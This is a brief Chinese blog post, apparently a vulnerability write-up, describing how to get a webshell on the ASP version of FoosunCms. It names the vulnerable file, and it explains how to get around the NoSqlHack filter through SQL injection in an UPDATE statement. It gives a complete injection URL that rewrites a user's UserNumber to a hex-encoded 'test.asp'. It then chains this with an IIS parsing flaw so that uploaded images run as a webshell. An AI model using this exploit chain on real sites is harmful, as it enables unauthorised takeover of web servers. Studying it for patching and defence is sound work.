FoosunCms的asp版本getshell

在文件\User\award\awardAction.asp中:

请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

3

webshell还可以用来代替access

我们文件管理中上传个图片文件:

http://192.168.1.101/UserFiles/27015564I69/2013_09_27_01_10_0390446.jpg

UserNumber就是等于27015564I69

通过以上的sql注入漏洞,直接update为test.asp

http://192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1

2

退出再重新登录

1

生成test.asp目录,后续上传的文件都会保存在该文件中

利用iis解析漏洞获取webshell

4

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录